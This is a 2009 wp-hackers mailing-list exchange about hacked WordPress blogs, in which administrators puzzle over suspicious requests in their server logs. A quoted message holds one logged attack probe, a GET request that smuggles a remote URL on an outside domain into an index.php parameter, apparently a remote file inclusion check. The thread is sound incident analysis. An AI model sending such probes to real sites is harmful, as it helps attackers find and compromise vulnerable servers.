[wp-hackers] Hacked blogs
gaarai at gaarai.com
Thu Mar 26 15:55:58 GMT 2009
Just to throw the idea out there. Is it possible that such requests are
merely red herrings? In other words, could those requests be distracting
away from the actual problem?
Looking at the code at the id.txt file, all that does is provide output
to the calling script that verifies certain characteristics of the
server. So, there probably is something else going on. Of course, it
also confirms that the target is vulnerable to that vector of attack.
Joost de Valk wrote:
> Nope, can't find a bloody thing yet. These kind of requests:
> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1
> in all the logs, but grepping through the entire htdocs dir, nothing
> that responds to them.
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
More information about the wp-hackers